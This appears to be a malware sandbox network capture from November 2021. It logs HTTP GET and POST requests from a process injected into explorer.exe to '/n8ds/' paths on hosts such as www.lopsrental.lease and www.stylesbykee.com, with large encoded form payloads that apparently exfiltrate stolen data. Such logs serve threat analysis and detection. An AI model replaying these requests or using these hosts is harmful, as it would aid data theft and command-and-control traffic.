a8nKdNxvZBiMeVgDoTAY70QZQCDlZyENhKs_xXWmx18LLxzozxrC1rSzC-5ZCPpKp9P115NwhgfE2endtz0JBuHFLx0ShjBoHqjCLyoaAbj_vC11c8i6tWcsedy7aDshRrbQMxXJnGvqwe(uBbLqpDTh5emXSCj8K2RQJniVnCsz4QnUJF0Nl6wgVpJif5oX7RS9cIYLFt7NiocgKwed10wS5LXsL1pkqs~aYEJ8vSj-hw1DpcPNUqQdvD1BpdgWA9Wzom6Q9KGgXv4iBE2gR7r_wIFrT-cVsvGhYqBYwfEGxN2RR38QCKJ68q4q5eqFPUXsor6NhKmdHDgsk_VNPOqTxnl6WHw8rpulr1J7SufzD8ouZ_y2hQ4maIeyYEmEi1JrKb295iMOEaXEQ_M2SXOuF-meQ7Amr-SMWj9COdoBote6e8r-zCUdgLY89_xcXFbqsgIBELGbReJYLHOJeS~XQA3my2FTNUEncQv5tOGjPZUnPZ3IDtxS7tEyFwywLpIVj5U0IA85jP0jCnYuit5stPpwC1wSFVuXJ_~kL16uktmmlkX0XQk84PvZEOlv9l6dU6fQxG3PZo~i5u5sv1ZbPUKXbv5l81MvM9oapJO9qyUy7xefoV0Ob3Ts~BnXKyeennFcuqJ-4UtcMoz5AnXoYu~s~Kozj7F4QPHIht1clTM8hMP7ENmH3C0VYCKr9H6fZzfofDuFoWD0kNzDsuW6T6M88vRB1TKR3_BroUXlv6TIKxIhEsTbKIqQcGySXbM5Zqzkkg(UjT6Fe9yndrYg4Fn9bP2bDXwZSE9vtFtMmRDcLp4JvQjrAFcFNWMWzdlzSA8jqjEVfQxuDf1O(DPv4tNaJws-sc4bMaOfmXZ7Gm7k4HEJIqW9t8qPNmK3bv~HXSh1QUOET3EGZ_aeRPL2DzJbWIpvAFdBoLroUf1uWixBHk5LvroIk6eDO4UCM9grBZ2nylcXrBq7kZ~Zt7DWibccT_58WumJfjX3l95T4MOkeQlZj_CbHF09HZmaN1Y1O-E7YRWZLyZIM3tAlXkDyxLLSRJJcSdup40ZX92vJZgRh7~hQtt97Cr0MFFLhgysMczPyut_oujeKdNCYYNefkDFI8cM91GaaI6SiYRBtaZ5Z11zoT0n(5rnFInz9ySPAA1Nmr44s464sNqARUSfrm6YhZc9XMC4clTA6ZTsg-7Sxkoboio9QfWhfNk0j5O77z6BdUGjxxm6Tc8ZU7d8Eb7DRs6jjAqY7FFvqC84n2eGps8T4k0hfOUu8-0JznIgX99m(ZUiEN0ipLQKdyyyOSCxL4ANSqA7kgdW1ZarnwnHJSCSxegSDDFOFRTFbkDQ6ge_Xs5LyEGEbywfLOoKa1KKH1nExKo07opEOrVzjKff3ZsyQSQi07GX3p0L1Rkm8aRJPQwmCMp0GKnjsSdnK69DeioJlfa4sRTwRBSgCZ0jYOiRyfcmeu(3snRQQDiqeydp3mQQPCoYIKFSx0VJXFSsHscD8SYG66tS6BMPb0HlkXTzqoGURqxs55dKsZcKv2CuqURqitlWx_0gLYOyfq3x5qmMO46zrAJt7q0E~A7ptz8gN5ZwoRmRCA7rdHK0l5Oagyhjc3Gx4bo73KmSL-vPn0Ej4zQWvtGEiEyHDcu8dMrFbk5oeIBBWcCmAhFlaXUBmNtkFDrKRd93upzirSQxOWaq(5d6gx~TfUzOUPraCowOfsKoUmadFkU7Vb1Vzuq92Sn_lzByJ75ol3r9LTzsHzDEDutaTpkuDiVXd6Cfyxp_VK5wdLl1~sgWQHtNzijAtWvCWeYP4vP0cRgSqZd0UiDSLgyxRZWpI8QY~0ZFLOaYl787BCMoenBdhanFKYPxu1WKLAR7VAsvVlM2U68VG2dl1WqNJxtPL0HrPAQKNSb6Kx4d0TPNnwZ8mauzpKxyMGGio16FcM~AHwPw0e3rU8NBkJ1J0X8nczYh9DGKNe2i(xqlLYT
                                                                                                                                                    Nov 29, 2021 14:11:27.479124069 CET7803OUTData Raw: 4a 4e 49 32 68 4a 69 46 68 72 66 43 56 4c 77 63 35 61 47 55 67 4b 76 53 50 68 49 70 58 72 31 65 79 6c 70 35 4c 28 67 45 5f 78 42 41 78 65 67 68 6e 4f 4e 48 59 39 54 35 77 39 38 65 70 73 67 7a 47 33 61 53 49 6c 65 79 51 38 4a 43 77 43 4d 7a 4b 6d
                                                                                                                                                    Data Ascii: JNI2hJiFhrfCVLwc5aGUgKvSPhIpXr1eylp5L(gE_xBAxeghnONHY9T5w98epsgzG3aSIleyQ8JCwCMzKmzEl8liK51tX3y~NnlT-6cx_~1dfjAZsii0AbkybAQ1B2WNCkjSxN7TaeUaYkIIt8KLJvVAyHE1Sdiyt0EFhOkveaLHcjlERW7NLbUvFoB7ePtxav0VDQ1qyiaxSdMQWGQ2Ub97WJOMkDgVadMb3LBMaQ-V16Id3PQ
                                                                                                                                                    Nov 29, 2021 14:11:27.638103008 CET7804OUTData Raw: 6a 78 6d 4a 52 76 52 7a 42 58 6a 52 35 67 43 55 78 73 75 71 49 64 61 4c 65 44 48 73 57 28 62 63 65 53 4b 43 68 6e 71 66 32 61 37 39 45 54 58 7a 73 32 66 4c 6d 7a 64 74 42 34 70 76 66 37 35 7e 33 7a 47 56 44 77 63 72 72 38 67 52 6a 6f 7a 7e 33 68
                                                                                                                                                    Data Ascii: jxmJRvRzBXjR5gCUxsuqIdaLeDHsW(bceSKChnqf2a79ETXzs2fLmzdtB4pvf75~3zGVDwcrr8gRjoz~3hENQV-39~uxpOdLb9pa-Z3vBmFhaQ9cGhG1MHrMlsJpSI4c49_lr1IfwuuzxFCPaUtVCE9fta3CkhzYB~jaf3RuVQagueVo_cEOdhNmB1UtbBQXt1pbpgXHJKyOcPn(GmYD8bnzROZBlLez9xr2IP3BO9NUrrqt15B
                                                                                                                                                    Nov 29, 2021 14:11:27.638290882 CET7824OUTData Raw: 79 71 37 69 72 45 57 43 57 39 5f 57 5a 34 70 64 6c 79 31 6b 31 75 52 72 31 75 4a 77 4a 67 4f 69 32 6a 72 48 32 55 48 6d 51 5a 34 68 46 6d 4a 77 4a 6e 7a 76 4b 4a 46 55 4d 47 6b 46 46 48 68 46 58 68 53 69 4e 36 54 4c 54 34 69 63 52 7e 39 73 42 41
                                                                                                                                                    Data Ascii: yq7irEWCW9_WZ4pdly1k1uRr1uJwJgOi2jrH2UHmQZ4hFmJwJnzvKJFUMGkFFHhFXhSiN6TLT4icR~9sBAB1ids7LLVJP7dB897dwdzh0jzXNavMjsnZDNND56WX5r8TolmEy1LnK7y7S2SV5btOZA9UyUYCcU3lRxz1MfqUGcvGNf7sct3HhC5EGjaqkNvQa88gDDFth8csN6qd1jr4dwGcq0S9h(QRfpxMd1WnEamD_IJ2MRl
                                                                                                                                                    Nov 29, 2021 14:11:27.799201012 CET7828OUTData Raw: 72 4f 7a 66 56 44 67 68 57 74 69 53 2d 34 59 65 42 44 61 41 70 56 59 77 50 4b 66 7a 77 72 73 6a 35 47 79 57 36 64 73 34 31 59 33 70 42 55 41 4d 4f 71 45 31 68 31 54 43 38 73 34 66 4e 6e 77 79 58 4e 6d 7e 4a 39 4f 39 58 54 41 6d 37 70 73 4c 4a 54
                                                                                                                                                    Data Ascii: rOzfVDghWtiS-4YeBDaApVYwPKfzwrsj5GyW6ds41Y3pBUAMOqE1h1TC8s4fNnwyXNm~J9O9XTAm7psLJTrVrsRoDZom0FS2Pl8ML9a9QwC03FNzcW8ZN54FBQZKDzKHUK_zbJAh_f-3MPghMw7FKKe14CS0iwjHaNuwlO6irGvJorUaXYslP72cficcEJ1G9WPILqip5gi5EsZvKU1~b(M3d5Yu1LWK8jenmOgYEll1QUPXApU
                                                                                                                                                    Nov 29, 2021 14:11:27.799252987 CET7836OUTData Raw: 4e 4d 35 79 64 6f 79 70 70 39 36 34 65 4b 70 61 6a 46 31 68 57 73 51 59 79 65 52 39 79 35 73 34 56 58 54 35 70 64 54 6e 7a 38 63 43 39 45 34 43 6e 68 50 45 2d 54 75 52 6b 36 44 65 62 46 62 6e 5a 53 38 78 64 30 52 44 68 74 4c 44 34 71 70 65 31 30
                                                                                                                                                    Data Ascii: NM5ydoypp964eKpajF1hWsQYyeR9y5s4VXT5pdTnz8cC9E4CnhPE-TuRk6DebFbnZS8xd0RDhtLD4qpe10XhIlLQ8aqdHo0wmoqpBWOA9FanEozhux3qIPmqp(IG_Z4DYT04H6q1ToH~QTJrfyodDsQjk0PkotgPaPk~Zz1XzMAffYiZjObg5HrxyzTigzRYWbfl_qBOEEgdBxYOU4hBkWgYFIZxrwuTJEQC1T1deAW07BGc2xl
                                                                                                                                                    Nov 29, 2021 14:11:27.799299955 CET7842OUTData Raw: 67 56 37 34 6b 32 73 66 30 4c 41 4b 2d 31 57 6c 70 75 32 46 42 64 35 6b 78 39 44 28 58 77 43 46 4d 68 32 61 4d 68 5a 54 72 45 41 33 37 42 42 4c 61 69 44 53 4e 74 6c 79 61 67 31 51 44 48 43 61 79 50 35 76 63 6c 57 59 48 72 75 75 4e 4d 31 72 66 39
                                                                                                                                                    Data Ascii: gV74k2sf0LAK-1Wlpu2FBd5kx9D(XwCFMh2aMhZTrEA37BBLaiDSNtlyag1QDHCayP5vclWYHruuNM1rf9ywLliTC1JuWWQVRi_PBLWDmYuDiAR8su2sjF0UfnzBYadyBylDSMZKcQcKV5W0X9_hcloM7KRPJR8kDz3i1x_dd56Sr7yjawi0yXnMb5LjERJvDWp70JSOfa5gV3BRZrCRV5lY1My8rIsk-T3CXjEBloaqHHsMrE7
                                                                                                                                                    Nov 29, 2021 14:11:27.799494982 CET7861OUTData Raw: 54 72 6c 79 54 78 4b 71 55 4b 56 78 50 4c 4f 6b 58 6f 61 36 42 28 30 44 4d 6f 37 47 46 50 4c 66 4a 6a 33 4f 31 48 68 53 56 62 67 46 5a 4c 4b 72 48 32 35 36 5f 74 65 4d 4b 57 52 35 59 41 50 78 42 31 38 42 6a 50 51 69 66 37 62 6d 55 37 48 38 68 37
                                                                                                                                                    Data Ascii: TrlyTxKqUKVxPLOkXoa6B(0DMo7GFPLfJj3O1HhSVbgFZLKrH256_teMKWR5YAPxB18BjPQif7bmU7H8h7D2pPp0locQagLVMHEQw~ccqZ8K0(9WuV_kJy7oUk9qnKpWm8jOOt1Z6evdR4N9z9KrDmC82zjHbNlEWWLpMUc5o~MuB9K6B(9uzjsHdCHal~iZups8isECLPlWWeGtYkb7QcV5zDEipLcN3xgsGY5zBetokfBTTKU
                                                                                                                                                    Nov 29, 2021 14:11:27.799652100 CET7866OUTData Raw: 49 75 45 62 56 4d 77 37 30 32 4d 64 33 37 37 6f 68 70 48 47 4d 67 37 43 44 6d 64 62 70 36 66 35 71 6d 39 46 56 55 5a 43 63 4c 42 52 65 59 41 35 33 34 45 6a 35 64 79 54 38 4a 4d 33 31 65 43 7e 35 4c 39 56 6b 6f 36 61 6b 64 50 69 72 37 4c 47 66 6c
                                                                                                                                                    Data Ascii: IuEbVMw702Md377ohpHGMg7CDmdbp6f5qm9FVUZCcLBReYA534Ej5dyT8JM31eC~5L9Vko6akdPir7LGflaPFxRYKkUhSQ9lvds2W73nU1ovXiw5GBrU28g2h0IxzsDQHGRlv2XhdaWw4dLxPXWSPixfNpKgX~YX7z_q6k1zQFzi6eZPEufP0gUblTZDwti9se9W9Ki05ZBoH4Dbp75F34FAAwDHe3L2RmrIDEgL7HFc8hyOO3P
                                                                                                                                                    Nov 29, 2021 14:11:27.961875916 CET7879OUTData Raw: 32 50 72 78 6b 44 42 63 53 66 56 31 34 6f 7a 4a 4a 51 55 71 5f 7e 4b 53 44 7e 6c 6e 79 32 78 57 6f 35 67 6f 46 59 57 73 32 68 71 6e 74 51 73 6e 6d 76 57 45 54 37 4d 70 6c 7a 4c 38 59 36 6c 54 39 35 65 31 58 6d 34 6b 38 79 45 69 36 38 62 4f 78 43
                                                                                                                                                    Data Ascii: 2PrxkDBcSfV14ozJJQUq_~KSD~lny2xWo5goFYWs2hqntQsnmvWET7MplzL8Y6lT95e1Xm4k8yEi68bOxCpe31AiS9AuYlpyA7uASdLiDMytkNmWt9pseh1lUmnSjN-2Kwtcw5H5jpQZNntZYD0ygDUZoku8CYbz8vfRW5yAo~VThVq4i7RmZnY2HLfZuLyTK9TlbjBAV7mIMj7mYWRaa8CytXlfpUr66y3k9TnIWjRPdV51xf0
                                                                                                                                                    Nov 29, 2021 14:11:27.961903095 CET7881OUTData Raw: 4f 6c 63 33 34 73 45 65 51 33 4f 53 2d 38 41 30 6c 37 47 74 77 28 79 30 68 59 75 56 35 32 71 52 4b 73 57 75 59 52 71 59 49 53 35 38 46 50 54 42 65 39 51 28 55 35 6b 74 41 58 39 70 56 6a 45 47 6b 45 33 4f 41 41 61 53 54 65 4f 30 35 65 53 72 65 59
                                                                                                                                                    Data Ascii: Olc34sEeQ3OS-8A0l7Gtw(y0hYuV52qRKsWuYRqYIS58FPTBe9Q(U5ktAX9pVjEGkE3OAAaSTeO05eSreYQBBtFapxwZi6HItPUEDFBCye1y-FU9DJZg5RkhGebUYZxi9uXEemYgKdk8xnIAXeHMgV8sT72xkn6Ak4GJT0qSB83t5wDyVRzI7~Wp_NFDXW7erY_4unWzYWnlc1qO_8ohcmo7SDV2zqkyeiO6-aCKjkFmnThZxIP


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    37192.168.11.2049851172.120.157.18780C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:11:27.640578032 CET7824OUTGET /n8ds/?lZOD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&3fVD2v=9rZXD0c8pBS HTTP/1.1
                                                                                                                                                    Host: www.stylesbykee.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:11:27.804884911 CET7867INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:11:23 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 801
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e b3 a4 c9 b3 ce cf b6 d9 bf c6 bc bc b9 c9 b7 dd d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                    Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></head><body><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    38192.168.11.204985266.29.140.18580C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:11:38.023766994 CET7939OUTPOST /n8ds/ HTTP/1.1
                                                                                                                                                    Host: www.lopsrental.lease
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 131142
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.lopsrental.lease
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: */*
                                                                                                                                                    Referer: http://www.lopsrental.lease/n8ds/
                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Data Raw: 6c 5a 4f 44 3d 6f 6d 4a 50 43 75 51 58 70 75 73 31 51 72 66 32 51 37 63 56 33 74 7a 44 52 33 72 57 28 76 36 4f 35 73 7e 49 44 74 62 41 73 55 53 4f 49 7a 72 5f 5a 59 4f 32 41 30 4e 59 70 41 61 32 38 72 42 50 4b 61 61 73 35 4d 53 5f 4e 74 6d 31 77 4d 45 7a 73 48 4c 2d 54 34 67 38 79 42 79 41 4c 30 4a 73 30 6a 77 64 67 45 50 63 5a 46 46 52 68 37 56 33 4a 5f 48 31 49 4c 68 71 75 48 57 69 37 61 47 58 37 7a 35 6b 4d 66 47 59 64 72 69 42 42 6c 36 41 55 48 70 42 56 6b 57 65 58 71 37 6a 30 59 61 55 5a 41 30 53 28 75 54 78 4c 63 46 38 38 30 35 69 49 75 67 47 65 43 7a 72 64 41 59 33 76 6d 5a 75 6b 66 38 7a 4b 4f 51 52 35 6d 4a 74 30 38 75 54 78 31 52 62 45 41 70 30 5a 38 52 64 73 68 41 35 69 4e 5a 48 37 61 58 72 77 59 6e 74 59 4a 49 4b 46 76 4f 63 74 34 44 50 53 47 66 6b 47 58 6a 67 69 6f 47 47 63 36 74 75 28 33 71 50 42 6f 33 75 78 73 67 6a 4b 38 7a 50 4e 64 37 75 69 6c 49 45 46 45 58 55 57 6a 6e 51 52 77 47 5a 75 69 30 6d 28 35 54 5a 6f 30 42 2d 75 68 47 58 7a 4a 5a 37 52 36 4b 45 6a 55 43 75 47 30 36 59 58 32 50 62 36 74 62 39 5a 79 68 6a 78 75 61 6c 50 58 63 6d 6c 5a 37 53 6c 64 34 53 42 53 30 53 33 2d 41 5f 4c 71 6e 42 43 76 31 37 4f 42 65 72 36 54 7a 64 62 6e 68 56 54 5a 62 34 50 4f 4c 43 75 30 72 30 7e 6b 4b 70 4b 62 69 50 4c 48 79 58 54 62 4b 65 62 62 4b 6a 42 30 34 67 59 69 76 39 7a 45 62 45 32 48 31 6f 65 57 76 5a 7a 62 31 49 4e 30 6d 58 6d 6b 52 35 46 43 74 76 56 73 55 5f 44 30 75 49 6c 42 6f 34 6d 30 55 6a 57 47 56 56 61 47 54 6c 34 6c 4c 44 76 50 5a 65 34 79 50 43 51 66 49 72 6c 4b 6a 6b 6b 48 6e 63 43 63 66 35 77 67 37 67 45 43 75 6b 70 47 37 51 4d 49 66 43 67 4b 66 58 31 72 28 6a 4c 33 48 31 79 6d 47 53 50 46 38 35 47 43 63 37 4d 35 32 74 50 65 59 6d 41 75 53 66 67 75 67 38 79 70 32 68 73 76 31 6b 68 62 7e 66 41 76 71 2d 47 65 38 32 56 41 33 33 75 63 28 4e 54 4c 66 30 30 31 32 5f 46 57 4b 34 6f 71 30 42 43 55 6b 53 75 77 43 76 4d 52 46 53 4e 53 43 6e 4d 48 53 6c 52 66 54 4a 50 34 77 59 42 67 5a 56 54 62 48 63 7e 78 77 68 75 78 50 64 4f 77 65 39 34 39 51 41 65 74 54 35 76 67 37 46 75 67 28 36 46 6a 4b 46 54 70 4d 6f 4e 42 78 30 66 46 5a 6e 46 70 51 68 6e 6c 78 47 58 50 36 41 51 5f 4a 4f 46 53 6c 39 63 66 30 52 78 4d 56 49 66 62 65 41 6e 69 52 66 4f 74 4c 68 72 6b 7e 37 36 63 66 47 38 76 46 43 6d 46 66 67 32 57 6e 6b 37 39 5a 53 43 39 54 44 4e 6b 36 56 70 58 71 46 65 59 44 6f 34 6a 66 6b 7e 79 61 44 32 74 38 68 74 69 38 6c 55 4d 69 65 74 33 4c 63 76 39 41 57 5a 53 62 65 49 55 78 69 4d 70 6c 2d 4f 61 41 38 72 62 34 62 55 36 41 49 75 58 55 56 52 77 78 5f 4e 56 32 48 6e 55 62 73 57 35 67 36 6b 34 55 68 61 5f 33 79 7e 53 48 4c 61 68 61 6b 56 65 43 38 5a 34 64 38 46 47 77 31 4e 32 6a 4f 6b 30 79 62 59 56 7e 67 54 79 51 65 51 41 53 49 66 71 5a 47 73 48 51 63 58 67 44 58 69 62 44 6e 50 58 4a 33 6a 6b 6d 68 6b 2d 6e 5f 30 54 7e 79 65 7a 36 74 41 31 6a 73 55 32 36 38 38 47 65 62 63 63 73 31 56 42 50 34 42 38 61 72 4f 33 58 66 58 7a 51 62 59 54 39 72 6d 56 69 6a 57 51 7e 41 28 4d 79 79 62 72 61 30 54 75 4a 70 30 69 6a 63 62 33 31 5a 62 46 52 4c 72 75 36 4c 6a 4b 37 78 77 32 47 62 4c 6f 46 7a 58 61 78 56 6c 41 33 72 71 36 48 31 66 31 66 70 5a 79 45 31 48 77 49 30 4d 78 6f 62 76 35 70 53 4a 66 67 42 73 63 67 45 7a 6a 62 78 45 50 51 6e 37 33 77 67 6d 7a 43 6a 7e 54 42 42 38 77 46 77 43 67 47 51 7a 73 59 6d 52 41 64 59 41 68 62 65 5a 62 31 31 48 30 43 39 6c 57 78 42 47 6a 38 57 48 66 6b 78 69 75 36 4f 50 66 4c 68 69 49 34 59 65 56 4d 42 4e 37 39 48 57 73 75 37 52 55 51 79 28 78 34 6e 56 33 45 52 30 43 50 5a 5a 4e 41 4c 71 48 62 30 4e 39 58 57 5a 57 67 35 35 68 33 32 47 6e 48 75 37 6b 71 4c 6f 2d 53 78 68 65 57 41 78 74 4b 61 6c 72 55 7a 41 4c 77 4d 6e 65 52 63 28 72 54 47 43 45 49 49 6a 63 38 70 4e 35 50 7a 78 6f 37 6d 53 4e 49 41 36 59 59 78 53 65 44 69 32 73 4a 73 59 72 50 72 66 58 4b 59 50 69 67 78 67 4f 61 6e 79 64 51 52 71 45 55 31 4c 35 4c 74 51 32 68 37 7a 63 4f 75 73 47 65 79 31 52 77 57 58 37 44 46 75 5a 38 6c 48 68 48 56 4e 30 67 78 63 43 49 75 6b 59 69 4a 32 6a 6f 6e 69 2d 44 49 35 57 6a 54 39 53 6a 68 32 59 71 52 53 53 4a 45 53 5a 42 72 6e 68 5a 6d 62 52 5a 50 58 47 47 4d 7e 2d 58 34 34 63 69 71 43 54 33 49 38 46
                                                                                                                                                    Data Ascii: lZOD=omJPCuQXpus1Qrf2Q7cV3tzDR3rW(v6O5s~IDtbAsUSOIzr_ZYO2A0NYpAa28rBPKaas5MS_Ntm1wMEzsHL-T4g8yByAL0Js0jwdgEPcZFFRh7V3J_H1ILhquHWi7aGX7z5kMfGYdriBBl6AUHpBVkWeXq7j0YaUZA0S(uTxLcF8805iIugGeCzrdAY3vmZukf8zKOQR5mJt08uTx1RbEAp0Z8RdshA5iNZH7aXrwYntYJIKFvOct4DPSGfkGXjgioGGc6tu(3qPBo3uxsgjK8zPNd7uilIEFEXUWjnQRwGZui0m(5TZo0B-uhGXzJZ7R6KEjUCuG06YX2Pb6tb9ZyhjxualPXcmlZ7Sld4SBS0S3-A_LqnBCv17OBer6TzdbnhVTZb4POLCu0r0~kKpKbiPLHyXTbKebbKjB04gYiv9zEbE2H1oeWvZzb1IN0mXmkR5FCtvVsU_D0uIlBo4m0UjWGVVaGTl4lLDvPZe4yPCQfIrlKjkkHncCcf5wg7gECukpG7QMIfCgKfX1r(jL3H1ymGSPF85GCc7M52tPeYmAuSfgug8yp2hsv1khb~fAvq-Ge82VA33uc(NTLf0012_FWK4oq0BCUkSuwCvMRFSNSCnMHSlRfTJP4wYBgZVTbHc~xwhuxPdOwe949QAetT5vg7Fug(6FjKFTpMoNBx0fFZnFpQhnlxGXP6AQ_JOFSl9cf0RxMVIfbeAniRfOtLhrk~76cfG8vFCmFfg2Wnk79ZSC9TDNk6VpXqFeYDo4jfk~yaD2t8hti8lUMiet3Lcv9AWZSbeIUxiMpl-OaA8rb4bU6AIuXUVRwx_NV2HnUbsW5g6k4Uha_3y~SHLahakVeC8Z4d8FGw1N2jOk0ybYV~gTyQeQASIfqZGsHQcXgDXibDnPXJ3jkmhk-n_0T~yez6tA1jsU2688Gebccs1VBP4B8arO3XfXzQbYT9rmVijWQ~A(Myybra0TuJp0ijcb31ZbFRLru6LjK7xw2GbLoFzXaxVlA3rq6H1f1fpZyE1HwI0Mxobv5pSJfgBscgEzjbxEPQn73wgmzCj~TBB8wFwCgGQzsYmRAdYAhbeZb11H0C9lWxBGj8WHfkxiu6OPfLhiI4YeVMBN79HWsu7RUQy(x4nV3ER0CPZZNALqHb0N9XWZWg55h32GnHu7kqLo-SxheWAxtKalrUzALwMneRc(rTGCEIIjc8pN5Pzxo7mSNIA6YYxSeDi2sJsYrPrfXKYPigxgOanydQRqEU1L5LtQ2h7zcOusGey1RwWX7DFuZ8lHhHVN0gxcCIukYiJ2joni-DI5WjT9Sjh2YqRSSJESZBrnhZmbRZPXGGM~-X44ciqCT3I8Fm9pLkvOoZuodaXiPAnf1HoeZ7nwF0YzcSeQs9QO29ujrWKaako0Y2MUtzmaooBLEOWOqiNtLXeKLzxP1r5CRWaEhwQ9KdOYOqklj8Mwb0sIKpg7Hec9f59kWy0PVkzAWJmOUseJtdqXl~p(vTE~Up9LJ1rOA7wyFswfcZAgJKgIuDeIliGnBPEozyl1vXnpivajCd_kMpHYbb4s9IcGa8Egz26O5HRbcwXxzSRXfO9mxRhUszdpym6rTrJCFitPpzYuH8jujW7g_hH4XPjC9GWJ2goWsGOLRuFId5cIOw1N7YM7OKU9DALp2Egc1MDWFHkwAfRnOLM6ar4rP74j_O90ucJy2gtW1(_q_56pZ2998K6COF8ztmYpiwziGNkylJxSDVzqaFCaEyZzTZxLxYLb6ONM_BlKI(OceoxxrlDUcUM6hlIr326R9XtsuuQdKZ7(YLmtOGkGrDDFays4TpLqRR4wTS_ZWvMQfLXj-NhOTmJPaAU8mt16GslH-tAKO(nc1BPBHUICcPF1_YXATGXNayqFtEA02MFWRNbFZORS9S-34H8mdMBEikVxIcJGOb7~j4bMszMeshG0iOSmFSW5qMb(OL4kMiR03~_13W59FYb3VFBI1Zna5HZwHiu2Xv-tWllMhkrK-2nkKCX4h00hICmvFnrJfo6c5OlBgYmxj5ZziT5W8H5qRk2~e1T2huhwv3Sw3WhkLeF84ZNHHpSerp3YQ6ik1lPtHY5UfwBohGVuuJjgJkSI7KO2byx5NMDDenotX~GCoezGma5Q3odJOdchJ2mSS6ILb5d5AbzYqIVa8ZyHexs0t8PHybRDFoJXB6ZvtMfaO0_HD83YeEItcpaRmyRnLrotM9f81jvmSXbjIIvEAW_ccbwrlYuuz2